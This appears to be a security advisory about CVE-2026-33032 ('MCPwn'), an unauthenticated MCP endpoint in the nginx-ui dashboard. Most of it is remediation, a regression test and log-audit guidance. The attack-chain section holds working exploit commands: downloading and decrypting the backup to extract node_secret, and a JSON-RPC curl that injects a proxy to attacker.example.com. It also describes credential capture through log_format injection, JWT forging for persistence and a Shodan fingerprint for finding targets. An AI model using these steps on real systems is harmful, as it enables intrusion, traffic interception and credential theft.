If you run nginx on Linux and use nginx-ui to manage it, you need to read this. A vulnerability disclosed in late March 2026 -- tracked as CVE-2026-33032, CVSS 9.8 -- has been under active exploitation in the wild. The flaw is not subtle. A single missing function call in nginx-ui's Model Context Protocol (MCP) integration left an entire command endpoint wide open, no credentials required. Pluto Security named the exploit technique MCPwn, and the name is apt: the right two HTTP requests from any network host give an attacker full write control over your nginx configuration, with automatic reloads to apply whatever they injected.
This article covers what nginx-ui is, what MCP is doing inside it, exactly how the attack chain works, what an attacker can accomplish once they have access, and what you need to do right now on your Linux system to close the exposure.
CVE-2026-33032 has been added to VulnCheck's Known Exploited Vulnerabilities (KEV) list. Recorded Future's Insikt Group flagged it as one of 31 high-impact CVEs actively exploited in March 2026, assigning it a risk score of 94 out of 100. PoC exploit code is publicly available. Patch immediately: the current secure version is nginx-ui 2.3.6.
What Is nginx-ui?
nginx itself is just a binary that reads configuration files. On a Linux server, managing those files -- adding server blocks, setting up upstream proxies, toggling modules, watching error logs -- is done at the command line. nginx-ui is a third-party web-based dashboard built on Go and Vue that wraps all of that into a graphical interface, complete with real-time log streaming, cluster management, SSL certificate handling, and AI-assisted configuration generation via ChatGPT integration.
It is not an official nginx project. It is a community tool that has grown to over 11,000 stars on GitHub and more than 430,000 Docker pulls. Many of those deployments run on the default port 9000. When Pluto Security researchers scanned Shodan at time of discovery, they identified approximately 2,689 publicly reachable instances. By the time of public disclosure in April 2026, more recent scans cited by BleepingComputer and SecurityWeek placed the figure at approximately 2,600 -- a count that shifts daily as instances are patched or exposed. Every unpatched instance in that population was an open target.
The Docker pull count -- over 430,000 -- suggests the true population of vulnerable deployments is far larger than the 2,600--2,689 publicly reachable instances identified in internet scans. Many more sit behind firewalls where they are reachable from internal network attackers or compromised hosts.
What Is MCP and Why Was It Added?
Model Context Protocol (MCP) is a standard for connecting AI assistants to applications. It allows a language model to call application functions directly -- rather than just generating text, the model can take action. In nginx-ui's case, MCP support means a connected AI assistant can add a reverse proxy rule, reload nginx, or read configuration files as direct operations rather than generating configuration text for a human to paste in.
The appeal is obvious. The risk is structural. When you bolt MCP onto an existing application, you are exposing the application's full capability set through a new set of HTTP endpoints. Every privileged action the application can perform -- config writes, service restarts, file reads -- becomes reachable via the MCP transport layer. If that transport layer does not inherit the same authentication controls as the rest of the application, those privileged actions become unauthenticated actions.
That is precisely what happened in nginx-ui.
Pluto Security researcher Yotam Perkal described the structural problem precisely: MCP endpoints inherit an application's full capabilities without necessarily inheriting its security controls -- turning a new integration feature into what Perkal called "a backdoor that bypasses every authentication mechanism."
-- Yotam Perkal, Pluto Security
The Vulnerability: One Missing Middleware Call
nginx-ui uses the SSE (Server-Sent Events) transport from the mcp-go library. This splits MCP communication across two HTTP endpoints:
GET /mcp-- Opens a persistent SSE stream. The client connects here to receive responses and is assigned a session ID. This endpoint enforces both IP whitelisting andAuthRequired()middleware.POST /mcp_message-- Accepts JSON-RPC tool invocations. Every config write, every nginx restart, every file read goes through here. This endpoint enforces IP whitelisting only -- and the default whitelist is empty, meaning allow-all.
Here is the complete MCP router from the vulnerable codebase (mcp/router.go, v2.3.3 and earlier). Read the two route registrations carefully:
// mcp/router.go (vulnerable version - v2.3.3 and earlier) func InitRouter(r *gin.Engine) { r.Any("/mcp", middleware.IPWhiteList(), middleware.AuthRequired(), func(c *gin.Context) { mcp.ServeHTTP(c) }) r.Any("/mcp_message", middleware.IPWhiteList(), func(c *gin.Context) { mcp.ServeHTTP(c) }) }
/mcp has IPWhiteList() and AuthRequired(). /mcp_message has IPWhiteList() only. Both route to the exact same handler function -- mcp.ServeHTTP(c) -- but /mcp_message, the endpoint where every destructive operation executes, skips authentication entirely.
The second line of defense, the IP whitelist, has its own fatal default. The relevant logic in internal/middleware/ip_whitelist.go:
// internal/middleware/ip_whitelist.go (vulnerable version) if len(settings.AuthSettings.IPWhiteList) == 0 || clientIP == "" || clientIP == "127.0.0.1" || clientIP == "::1" { c.Next() // Empty whitelist = allow everyone; localhost always bypasses return }
The full condition passes the request through when the whitelist is empty, when the client IP cannot be resolved, or when the caller is localhost (127.0.0.1 or ::1). c.Next() is Gin's signal to proceed to the next handler. Every fresh nginx-ui installation ships with an empty whitelist, so the first condition fires for all non-localhost callers -- and localhost always bypasses the check regardless of whitelist configuration. Two security mechanisms, both fail-open by default. The result: any host on the network can invoke any MCP tool against a default deployment.
The fix in commit 413dc63 (v2.3.4, released March 15, 2026) added exactly 27 characters: , middleware.AuthRequired() to the /mcp_message route registration. The same middleware that /mcp already had. The commit also added a regression test (mcp/router_test.go) that explicitly verifies both endpoints return HTTP 403 when accessed without authentication -- a test that would have caught the original vulnerability had it existed during development.
func TestMCPEndpointsRequireAuthentication(t *testing.T) { settings.AuthSettings.IPWhiteList = nil router := gin.New() InitRouter(router) for _, endpoint := range []string{"/mcp", "/mcp_message"} { req := httptest.NewRequest(http.MethodPost, endpoint, nil) w := httptest.NewRecorder() router.ServeHTTP(w, req) assert.Equal(t, http.StatusForbidden, w.Code) } }
There is a known inconsistency in official version metadata. The OSV entry for CVE-2026-33032 lists v2.3.5 as the last affected version; the GHSA advisory (GHSA-h6c2-x2m2-mwhf) lists versions <=1.99. Both are incorrect. Pluto Security's source code verification confirms: v2.3.3 is the last vulnerable version and v2.3.4 contains the fix. To avoid ambiguity from these data inconsistencies, update to the current latest release, v2.3.6.
All 12 Exposed MCP Tools
The unauthenticated /mcp_message endpoint exposes 12 named tools split into two categories. The tool names used in JSON-RPC invocations are exact -- these are the strings you would see in access logs or network captures of an active exploitation attempt:
| Tool Name | Type | Capability |
|---|---|---|
nginx_config_add | destructive | Create config files + auto-reload nginx immediately |
nginx_config_modify | destructive | Modify any existing config file |
nginx_config_enable | destructive | Enable or disable site configurations |
nginx_config_rename | destructive | Rename config files |
nginx_config_mkdir | destructive | Create directories in the config tree |
reload_nginx | destructive | Reload nginx configuration gracefully |
restart_nginx | destructive | Restart the nginx process entirely |
nginx_config_get | read-only | Read any config file contents |
nginx_config_list | read-only | Enumerate all configuration files |
nginx_config_base_path | read-only | Retrieve the config directory path |
nginx_config_history | read-only | View configuration change history |
nginx_status | read-only | Read nginx server status |
Pay particular attention to nginx_config_add. It does not just write a file -- it triggers an automatic nginx reload after writing. Config injection and service activation happen in a single unauthenticated API call, with no second step required.
The Full Attack Chain
Exploiting CVE-2026-33032 in its simplest form requires only network access and two HTTP requests. There is also a companion vulnerability -- CVE-2026-27944, also CVSS 9.8 -- that collapses the one remaining barrier for fully default deployments.
How the SSE session transport works
Understanding the attack requires understanding what the GET /mcp response looks like in practice. When a client connects to open the SSE stream, the server sends back an event in this exact format:
# The server responds with an SSE event containing the message endpoint URL # The sessionId embedded in the data field is what the attacker reuses event: endpoint data: /mcp_message?sessionId=4f4cdb82-152b-4c10-8f63-1df90e1e061f
That session ID is a UUID the server generates and associates with the SSE stream. From that point forward, tool invocations are POSTed to /mcp_message?sessionId=<uuid> and responses flow back through the still-open SSE stream. The node_secret query parameter is what nginx-ui uses to authenticate the initial GET /mcp session -- it is not re-checked on subsequent /mcp_message calls. Once the session UUID is obtained, node_secret is no longer needed.
Step 1: Obtain node_secret via CVE-2026-27944
On a fully default deployment, the attacker cannot call GET /mcp directly because it requires a valid node_secret. CVE-2026-27944 (CVSS 9.8, affects versions prior to 2.3.3) eliminates this barrier. The /api/backup endpoint is accessible without authentication, and the server makes decryption trivial: the AES-256 encryption key and IV are returned in plaintext in the X-Backup-Security response header alongside the encrypted backup archive. An attacker downloads the backup with a single GET request, reads the decryption key from the response header, and decrypts the archive to obtain the complete nginx-ui data set including user credentials, session tokens, SSL private keys, all nginx configuration files, and the node_secret credential used to authenticate the MCP session.
# CVE-2026-27944: unauthenticated backup download + key disclosure # Step 1: Download encrypted backup -- AES-256 key and IV in X-Backup-Security header $ curl -sD headers.txt http://TARGET:9000/api/backup -o backup.zip $ grep X-Backup-Security headers.txt # X-Backup-Security: BASE64_AES_KEY:BASE64_IV # Step 2: Decrypt the backup using the disclosed key $ python3 -c " import base64, zipfile from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes from cryptography.hazmat.backends import default_backend key = base64.b64decode('BASE64_AES_KEY') iv = base64.b64decode('BASE64_IV') with open('backup.zip','rb') as f: data = f.read() dec = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend()).decryptor() open('decrypted.zip','wb').write(dec.update(data) + dec.finalize()) " # Step 3: Extract node_secret from the decrypted archive $ unzip -p decrypted.zip app.db | strings -n 8 | grep node_secret # Step 4: Use node_secret to open an authenticated SSE session on /mcp $ curl -N "http://TARGET:9000/mcp?node_secret=RECOVERED_SECRET" # event: endpoint # data: /mcp_message?sessionId=4f4cdb82-152b-4c10-8f63-1df90e1e061f
On many containerized deployments, node_secret is also present in environment variables, Docker Compose files, and Kubernetes secrets accessible from a compromised neighboring workload. An attacker with any foothold in the same cluster may not need CVE-2026-27944 at all -- node_secret leaks through multiple channels in typical deployment patterns. Even without the backup endpoint, the X-Backup-Security header pattern means any exposure of the nginx-ui management port is sufficient.
Step 2: Invoke tools via unauthenticated /mcp_message
With a valid session UUID, the attacker sends POST requests directly to /mcp_message. The session ID is the only token presented. No node_secret. No JWT. No cookies. The /mcp_message route has no AuthRequired() call, so the Gin middleware chain passes the request straight through to the handler. This is not a logic flaw or a bypass -- it is a missing check that was simply never written.
# Full exploitation demonstrated from a separate machine on the network # Attacker: 172.21.0.3 | Target nginx-ui: 172.21.0.2:9000 # No authentication header, cookie, or node_secret is sent $ curl -s -X POST "http://172.21.0.2:9000/mcp_message?sessionId=4f4cdb82-152b-4c10-8f63-1df90e1e061f" \ -H "Content-Type: application/json" \ -d '{ "jsonrpc": "2.0", "id": 1, "method": "tools/call", "params": { "name": "nginx_config_add", "arguments": { "name": "attacker_injected", "content": "server { listen 80 default_server; server_name _; location / { proxy_pass http://attacker.example.com; } }" } } }' # nginx-ui writes the config file to disk and triggers an immediate reload # The attacker-controlled proxy is live on the server with no further steps
Pluto Security's PoC ran this from a container at 172.21.0.3 against a target at 172.21.0.2 -- a completely separate host, not localhost. The PoC enumerated all 12 tools, read the existing nginx.conf, injected a new server block, and confirmed nginx auto-reloaded with the malicious configuration, all in a single automated run with zero credentials presented at any point to /mcp_message.
What an Attacker Can Do
Full unauthenticated access to nginx-ui's MCP tools translates to a wide range of concrete post-exploitation capabilities on the Linux host running nginx:
Traffic interception and credential capture
By rewriting server blocks to route traffic through an attacker-controlled upstream, the attacker can transparently proxy all HTTP and HTTPS traffic passing through the server.
Custom access_log directives with a crafted log_format pattern can be injected to write Authorization header values directly to a file. Every administrator who logs into nginx-ui while that logging directive is active has their credentials captured.
JWT escalation to permanent access
This is the step that makes the attack durable beyond the initial session. Once an administrator's captured JWT is in hand, the attacker can call the nginx-ui settings API to extract the JwtSecret used to sign all tokens. With that secret, they can forge valid admin JWT tokens for any user account and maintain persistent administrative access that survives configuration cleanup -- even after the original vulnerability is patched and the MCP endpoint is locked down.
Configuration exfiltration and topology mapping
The nginx_config_list and nginx_config_get tools expose the complete set of configuration files, revealing upstream server addresses, internal service names, TLS certificate paths, and any credentials embedded in configuration.
The nginx_config_history tool reveals the full change log. The read-only tools provide a complete architectural map of everything sitting behind nginx.
Service disruption
Writing a syntactically valid but semantically destructive config -- such as one that removes all server blocks -- and triggering a reload with reload_nginx takes nginx offline cleanly.
Because nginx validates configuration before applying it, an invalid config fails gracefully without crashing the process, but a valid config that removes all listeners achieves the same result: no traffic is served.
Persistent backdoor placement
Configuration files written via nginx_config_add persist across nginx restarts.
An attacker can embed a persistent redirect or proxy rule that survives service restarts and remains in place after the initial access vector is patched, unless administrators audit and clean all configuration files. The nginx_config_history tool -- which the attacker also has read access to -- can be used to identify the oldest configuration files and understand how to blend injected configs into the existing history.
Updating nginx-ui does not remove malicious configuration files already on disk. It does not revoke forged JWTs if JwtSecret was extracted. Review all nginx configuration files in /etc/nginx/, conf.d/, and sites-enabled/ for unauthorized additions. Unexpected proxy_pass directives, custom access_log entries, and unfamiliar server blocks are indicators of post-exploitation activity. Rotate JwtSecret if you suspect the settings API was accessed.
Why This Hits Linux Administrators Hard
nginx is overwhelmingly a Linux workload. nginx-ui was built for Linux servers. The default deployment model -- Docker container or direct binary on port 9000 -- means this dashboard is often running on the same host as production nginx, sometimes exposed directly to the internet without a separate management network.
Pluto Security identified exposed instances using a technique worth understanding: Shodan favicon hash fingerprinting.
nginx-ui's favicon has a consistent hash of -1565173320, queryable as http.favicon.hash:-1565173320 in Shodan. This is more reliable than scanning for service banners because the favicon is served even when the application is otherwise unconfigured or the login page gives no version information. At time of Pluto Security's initial scan, the technique returned 2,689 instances spread across more than 50 countries, running primarily on Alibaba Cloud, Oracle Cloud, Tencent Cloud, and DigitalOcean, with the large majority on the default port 9000. By time of public disclosure, BleepingComputer reported the count at approximately 2,600, reflecting ongoing patching activity -- the number is a moving target as administrators respond to the public advisory.
The Docker deployment pattern is particularly telling. The image (uozi/nginx-ui on Docker Hub) has over 430,000 pulls. Many of those containers are spun up quickly, added to a docker-compose setup, and never hardened further. Port 9000 gets exposed to 0.0.0.0, MCP support gets enabled because the AI integration features are compelling, and the security posture of the container mirrors the default nginx-ui configuration -- which is fail-open on IP whitelisting.
Linux firewall rules should have been the backstop. In many of these deployments, they were not.
The Broader MCP Security Problem
CVE-2026-33032 is the second major MCP vulnerability Pluto Security has disclosed as part of a continuing research effort mapping risk across the MCP ecosystem. The first was MCPwnfluence -- CVE-2026-27825 (CVSS 9.1) and CVE-2026-27826 (CVSS 8.2) in the widely deployed mcp-atlassian server. MCPwnfluence chains an SSRF with a file upload path to achieve full unauthenticated RCE from any host on the local network. The two research findings are distinct vulnerabilities in different products and are not technically chained with each other -- they share a class of failure, not an attack path.
Pluto's researchers note they are finding the same structural weaknesses across multiple MCP server implementations they have examined:
- Authentication on the SSE connection endpoint, but not on the message endpoint -- the exact pattern in CVE-2026-33032
- IP allowlists that default to allow-all when the list is empty, rather than failing closed
- Security controls documented in README files but implemented as dead code never reached at runtime
- OAuth scopes advertised in configuration but never validated when tool invocations arrive
The SSE transport design makes this class of mistake intuitive to introduce. Developers reason about the SSE stream as the "connection" that needs protecting -- it is the thing that establishes the session, like a handshake. The message endpoint feels like a data pipe, not a privileged surface. But in MCP's architecture, the message endpoint is where all power is exercised. Locking the stream endpoint while leaving the message endpoint open is equivalent to requiring a key to enter the building lobby but leaving all the server rooms unlocked inside it.
Treat every MCP endpoint as a privileged API. Audit both SSE endpoints -- the stream connection and the message handler -- and write explicit authentication tests for the message endpoint. The regression test added in nginx-ui commit 413dc63 is a usable template: assert that both /mcp and /mcp_message return HTTP 403 when hit without credentials. Default IP allowlists fail-closed, not fail-open. There is no passive MCP endpoint -- every tool invocation path can be weaponized.
MITRE ATT&CK Technique Mapping
The full MCPwn attack chain maps to nine MITRE ATT&CK techniques across five tactics. The table below maps each stage of the documented exploit to its corresponding technique ID.
| Technique | ID | Tactic | How It Applies |
|---|---|---|---|
| Exploit Public-Facing Application | T1190 |
Initial Access | Unauthenticated POST to /mcp_message exploits the missing AuthRequired() middleware to gain immediate privileged access to the nginx server |
| Active Scanning: Vulnerability Scanning | T1595.002 |
Reconnaissance | Shodan favicon hash fingerprinting (http.favicon.hash:-1565173320) to identify and enumerate exposed nginx-ui instances at scale |
| Unsecured Credentials: Credentials In Files | T1552.001 |
Credential Access | Unauthenticated download of /api/backup (CVE-2026-27944) yields node_secret, user credentials, and SSL private keys from the unprotected backup archive |
| Input Capture: Web Portal Capture | T1056.003 |
Credential Access | Injecting a crafted log_format directive that writes Authorization header values to disk, capturing credentials of every user who authenticates while the directive is active |
| Steal Application Access Token | T1528 |
Credential Access | Extracting JwtSecret from the nginx-ui settings API and using it to forge persistent admin JWT tokens valid for any user account |
| File and Directory Discovery | T1083 |
Discovery | nginx_config_list, nginx_config_get, and nginx_config_history tools enumerate all configuration files, revealing internal topology, upstream addresses, TLS certificate paths, and embedded credentials |
| Adversary-in-the-Middle | T1557 |
Collection | Rewriting server blocks to route HTTP/S traffic through an attacker-controlled upstream proxy for transparent interception of all traffic through the server |
| Server Software Component: Web Shell | T1505.003 |
Persistence | Malicious nginx configuration files written via nginx_config_add persist across service restarts and survive patching, establishing durable backdoor access to all traffic the server handles |
| Endpoint Denial of Service | T1499 |
Impact | Writing a configuration that removes all server blocks and triggering reload_nginx takes the server offline without crashing the nginx process -- nginx validates and applies the empty config cleanly |
Remediation and Hardening on Linux
The primary fix is straightforward: update nginx-ui. The vulnerability was patched in version 2.3.4, released March 15, 2026, one day after responsible disclosure. The current secure version is 2.3.6. The patch adds AuthRequired() middleware to the /mcp_message route and changes the default IP allowlist behavior from fail-open to fail-closed.
# Check installed version (direct binary) $ nginx-ui --version # Check version in Docker container $ docker exec nginx-ui nginx-ui --version # Any version below 2.3.4 is vulnerable to CVE-2026-33032 # Any version below 2.3.3 is also vulnerable to CVE-2026-27944 (backup exposure)
If you cannot patch immediately, the following interim mitigations reduce exposure while you prepare the update.
Block MCP access if you are not using it
nginx-ui has no configuration directive to disable the MCP endpoints entirely -- the /mcp and /mcp_message routes are compiled into the binary and always registered. If you are not using the MCP feature, the correct approach is to prevent access at the network level by restricting port 9000 with firewall rules (see below) and setting an explicit IP allowlist so that no external host can reach the MCP endpoints. This eliminates the attack surface without requiring a configuration toggle that does not exist.
Lock down the IP allowlist
Set an explicit IP allowlist in /usr/local/etc/nginx-ui/app.ini under the [auth] section. An empty IPWhiteList defaults to allow-all -- this is the configuration that makes the exploit trivially reachable from any network host. Each entry is a separate line. Once any entry is set, only those IPs and 127.0.0.1 can reach the nginx-ui interface at all:
# /usr/local/etc/nginx-ui/app.ini # Add the [auth] section if it does not already exist [auth] # Add one IPWhiteList entry per line for each trusted management IP # IPv4 and IPv6 are both supported IPWhiteList = 192.168.1.10 IPWhiteList = 10.0.0.5 # After editing, restart nginx-ui to apply # systemctl restart nginx-ui
Note that 127.0.0.1 is always allowed regardless of the allowlist -- this is hardcoded in the middleware, not configurable. This means any process running on the same host can still reach the management interface. The allowlist protects against remote attackers, not local privilege escalation.
Restrict port 9000 at the Linux firewall
nginx-ui should never be reachable from the public internet. Use nftables or iptables to limit access to port 9000 to trusted source addresses only. The following nftables example drops all traffic to port 9000 except from a specific management address:
# These rules are a standalone example showing the port 9000 restriction pattern. # Merge these rules into your existing /etc/nftables.conf rather than replacing it. # On a server with existing rules, adding a second filter table of the same name will # conflict. Add the port 9000 accept/drop rules to your existing input chain instead. # Test first: nft -c -f /etc/nftables.conf -- then apply: systemctl reload nftables table inet filter { chain input { type filter hook input priority 0; policy drop; # Always accept loopback traffic iif lo accept # Drop invalid conntrack state early ct state invalid drop # Allow established and related connections ct state established,related accept # Allow nginx-ui only from management host (IPv4) # If your management host uses IPv6, add: ip6 saddr <mgmt-ipv6> tcp dport 9000 accept ip saddr 192.168.1.10 tcp dport 9000 accept # Drop all other traffic to port 9000 tcp dport 9000 drop # Allow nginx itself on 80/443 tcp dport { 80, 443 } accept } }
# Allow port 9000 only from management IP, drop everything else # iptables -A INPUT -s 192.168.1.10 -p tcp --dport 9000 -j ACCEPT # iptables -A INPUT -p tcp --dport 9000 -j DROP # Make persistent -- requires iptables-persistent package # Install if needed: apt install iptables-persistent # netfilter-persistent save
Audit nginx configuration for post-exploitation indicators
If your nginx-ui instance was exposed prior to patching, treat it as potentially compromised. Review all configuration files nginx-ui manages:
# List all nginx config files and their modification times # -printf is GNU coreutils find only (standard on Linux; not available on BSD/macOS) $ find /etc/nginx/ -name "*.conf" -printf "%T+ %p\n" | sort # Look for unexpected proxy_pass directives pointing to external hosts $ grep -r "proxy_pass" /etc/nginx/ --include="*.conf" # Look for unexpected access_log directives (credential harvesting indicator) $ grep -r "access_log" /etc/nginx/ --include="*.conf" # Check nginx-ui access logs for /mcp and /mcp_message requests # Matches /mcp (SSE session open) and /mcp_message (tool invocations) and /api/backup $ grep -E "/(mcp|api/backup)" /var/log/nginx-ui/access.log # Look for /api/backup access in nginx access logs (CVE-2026-27944 indicator) # Any 200 response to /api/backup from an external IP indicates successful exploitation $ grep "api/backup" /var/log/nginx/access.log
How to Remediate CVE-2026-33032 on Linux
Step 1: Update nginx-ui to version 2.3.6 or later
Update nginx-ui to at least version 2.3.4, which patches CVE-2026-33032 by adding the missing AuthRequired() middleware to the /mcp_message route. Version 2.3.6 is the latest secure release as of April 2026. Use the nginx-ui GitHub releases page or the official installation script to obtain the update. The patch is a one-line change, but it is the only complete fix -- interim mitigations reduce exposure but do not close the vulnerability.
Step 2: Set an explicit IP allowlist in app.ini
Add an IPWhiteList entry under the [auth] section of /usr/local/etc/nginx-ui/app.ini for each trusted management IP address. An empty allowlist defaults to allow-all. Once any entry is set, only those IPs and localhost can reach the nginx-ui management interface. Restart nginx-ui after editing: systemctl restart nginx-ui. This is a defense-in-depth measure, not a replacement for patching -- the CVE exploits /mcp_message directly, and the allowlist check on that endpoint was also fail-open in vulnerable versions.
Step 3: Restrict access to nginx-ui port 9000 at the Linux firewall
Use nftables or iptables to block public access to port 9000, the default nginx-ui port. Only trusted management network CIDR ranges should be able to reach it. This is the single most effective interim mitigation if you cannot patch immediately -- an attacker who cannot reach port 9000 cannot exploit the vulnerability regardless of nginx-ui's internal state.
Step 4: Audit nginx access logs for exploitation indicators
If your nginx-ui instance was reachable before patching, treat it as potentially compromised. Check nginx-ui access logs for GET requests to /mcp, POST requests to /mcp_message, and GET requests to /api/backup. In nginx configuration files, look for unexpected proxy_pass directives pointing to external hosts, custom access_log entries logging request headers, and unfamiliar server blocks added to conf.d/ or sites-enabled/. Rotate JwtSecret and node_secret if exploitation is suspected.
Frequently Asked Questions
What is CVE-2026-33032 and why does it have a CVSS score of 9.8?
CVE-2026-33032 is an authentication bypass vulnerability in nginx-ui, a web-based management interface for the nginx web server. It scores 9.8 on the CVSS scale because it requires no authentication, no user interaction, and no special privileges to exploit -- any network-adjacent attacker can send two HTTP requests and gain full administrative control over the nginx service, including the ability to write configuration files and trigger immediate reloads.
What is the MCPwn attack and how does it work against nginx-ui?
MCPwn is the name Pluto Security gave to the CVE-2026-33032 exploit chain. nginx-ui added Model Context Protocol (MCP) support, which splits communication across two HTTP endpoints: GET /mcp to establish a session, and POST /mcp_message to send tool commands. The /mcp endpoint enforces authentication; the /mcp_message endpoint does not. An attacker first exploits a companion vulnerability (CVE-2026-27944) to download a backup archive containing the node_secret credential, uses that to obtain a valid session ID from /mcp, and then calls /mcp_message freely to invoke any of the 12 exposed MCP tools -- including configuration writes with automatic nginx reload.
How do I check if my Linux nginx-ui installation is vulnerable to CVE-2026-33032?
Run nginx-ui --version or check the installed package version on your Linux system. Any version prior to 2.3.4 is vulnerable to CVE-2026-33032. You can also check whether your nginx-ui instance has MCP support enabled by looking at its configuration file for mcp-related directives. If the instance is publicly reachable on its default port 9000, treat it as actively at risk until patched.
What should I do right now if I cannot immediately patch nginx-ui on my Linux server?
If you cannot update to nginx-ui 2.3.4 or later immediately, note that nginx-ui has no configuration directive to disable MCP -- the endpoints are always registered. The most effective interim step is to block port 9000 at the firewall so the endpoint cannot be reached from the network. Additionally, set an explicit IPWhiteList in the [auth] section of app.ini to restrict access to trusted management IPs, and monitor nginx-ui access logs for unexpected requests to the /mcp, /mcp_message, and /api/backup endpoints.
Wrapping Up
CVE-2026-33032 is a textbook example of what happens when AI integration features are shipped without giving their transport layer the same security scrutiny as the rest of the application. nginx-ui added MCP support because the capability is genuinely useful -- an AI assistant that can directly manipulate nginx configuration is a real productivity gain for administrators. But the /mcp_message endpoint went live without the AuthRequired() call that every other privileged route in the application carries. One function. CVSS 9.8.
The broader lesson is one that will keep recurring as AI integration becomes standard practice. MCP endpoints, like any other API surface that exposes privileged operations, need the same threat modeling, authentication controls, and network-level access restrictions as the most sensitive parts of the application they are attached to. There is no passive MCP endpoint. Every tool invocation path can be weaponized, and the attacker does not care whether it was added for an AI assistant or a human operator.
If you run nginx-ui on Linux: update to 2.3.6, lock down port 9000 at the firewall, set a real IP allowlist, and audit your configuration files. If you have been exposed, assume the worst, audit everything nginx-ui manages, and rotate JwtSecret.
Disclosure Timeline
| Date | Event |
|---|---|
| 2026-03-04 | Vulnerability discovered by Pluto Security researcher Yotam Perkal during MCP ecosystem research |
| 2026-03-04 | Reported to nginx-ui maintainers via GitHub Private Vulnerability Reporting |
| 2026-03-14 | Fix committed by maintainers (commit 413dc63), including regression test mcp/router_test.go |
| 2026-03-15 | v2.3.4 released publicly with the fix; same day Pluto Security published initial technical details |
| 2026-03-28 | CVE-2026-33032 published in the NVD; full PoC exploit and technical details released publicly |
| 2026-03 | Active exploitation in the wild confirmed (per Recorded Future Insikt Group March 2026 CVE Landscape report) |
| 2026-04-13 | VulnCheck adds CVE-2026-33032 to its Known Exploited Vulnerabilities (KEV) list; Recorded Future assigns risk score 94/100 |
Sources and References
Technical details in this article are drawn from original security research and verified sources.
- Pluto Security -- Original CVE-2026-33032 research and MCPwn exploit chain documentation
- BleepingComputer -- Active exploitation confirmation and PoC disclosure timeline
- Infosecurity Magazine -- Shodan exposure data and Docker pull count analysis
- The Hacker News -- Full two-CVE chain analysis and mitigation guidance
- NIST NVD -- CVE-2026-33032 -- Official vulnerability database entry